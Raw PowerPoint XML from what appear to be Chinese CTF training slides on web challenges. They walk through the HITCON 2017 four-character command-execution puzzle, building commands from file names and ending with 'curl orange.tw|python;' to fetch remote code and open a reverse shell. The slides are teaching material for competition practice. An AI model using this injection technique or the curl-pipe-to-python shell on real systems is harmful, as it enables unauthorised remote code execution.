              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Perl</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>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2240280" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>困难题目：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31445950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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>例子（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>HITCON2017</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A654B1E-4F7C-5145-8E2C-CDACF01A6F7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="16500" b="24928"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="335197" y="1810265"/>
            <a:ext cx="11485437" cy="4097327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1887CCAA-BF53-2147-8667-9D0ED4ACF521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061720" y="5907592"/>
            <a:ext cx="10373360" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>每次只能执行</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>个字符的命令，通过一些骚操作，实现任意命令执行</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36519002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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>例子（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>HITCON2017</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1887CCAA-BF53-2147-8667-9D0ED4ACF521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="787400" y="5584427"/>
            <a:ext cx="10373360" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>g&gt; ht- sl" </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>写到文件 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>v"</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75D9692A-E19E-0D41-9CD6-B81BFA74ACB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061720" y="1747197"/>
            <a:ext cx="9667240" cy="3354765"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第一步：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;dir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;sl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;g\&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;ht-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3600" b="1">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;v</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="36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207590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4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>例子（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>HITCON2017</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1887CCAA-BF53-2147-8667-9D0ED4ACF521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708660" y="5264387"/>
            <a:ext cx="10373360" cy="954107"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>v"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中的字符串倒序，放到文件</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>x"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>就变成了 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ls -th &gt;g"</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75D9692A-E19E-0D41-9CD6-B81BFA74ACB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061720" y="1747197"/>
            <a:ext cx="9667240" cy="2185214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第二步：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>&gt;rev</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>*v&gt;x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="307673268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基本介绍</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15B8DEB5-0F52-604C-8E06-F44E4891C047}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640080" y="1066801"/>
            <a:ext cx="9677400" cy="3894143"/>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给定一个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网站</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>根据题目所给提示信息，找到网站上的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>字符串</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>做题方式类似于真实渗透，可能涉及信息收集、各类漏洞发现与利用、权限提升等等</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>为了获取</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>flag</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，可能需要拿到管理员权限，数据库权限，甚至获取网站所在服务器的权限</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217535691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题目类型</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>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457200" y="929640"/>
            <a:ext cx="4480560" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>例子（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="3200" b="1" dirty="0"/>
              <a:t>HITCON2017</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="3200" b="1"/>
              <a:t>）：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1887CCAA-BF53-2147-8667-9D0ED4ACF521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="708660" y="5866837"/>
            <a:ext cx="10373360" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成命令 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>curl orange.tw|python;”</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>即可反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2800">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75D9692A-E19E-0D41-9CD6-B81BFA74ACB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1061720" y="1747197"/>
            <a:ext cx="9667240" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>第三步：</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2800" b="1" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
